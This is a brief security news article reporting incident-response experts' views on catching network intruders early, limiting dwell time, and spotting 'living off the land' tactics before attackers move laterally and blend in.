Spot the Intruder: Don't Miss Your Shot
The first few days following a cyberattack are "golden" for detecting malicious activity on your network, said Stuart McKenzie, vice president of Mandiant EMEA at FireEye, during a discussion about incident response against US companies.
More attackers, both nation-states and cybercriminals, are "living off the land" and using legitimate systems to move throughout an environment and stay hidden, said Wendi Whitmore, global lead of IBM X-Force Incident Response and Intelligence Services. "We continue to see that spread," she noted. Some attackers aren't as adept at waging the software, which may give them away.
Companies need to do more to cut down "dwell time," or the amount of time an attacker is on the network before acting, McKenzie explained. First- or second-stage impact is crucial, he said, because this is when an intruder will display the most unusual activity. Once on the network for a few days, the intruder will try to move laterally and find credentials, which will make his actions blend in with normal users. From that moment, the defenders' job becomes even more difficult. "If you catch them early on, then you can make moves," McKenzie said.
(Image: Luckybusiness – stock.adobe.com)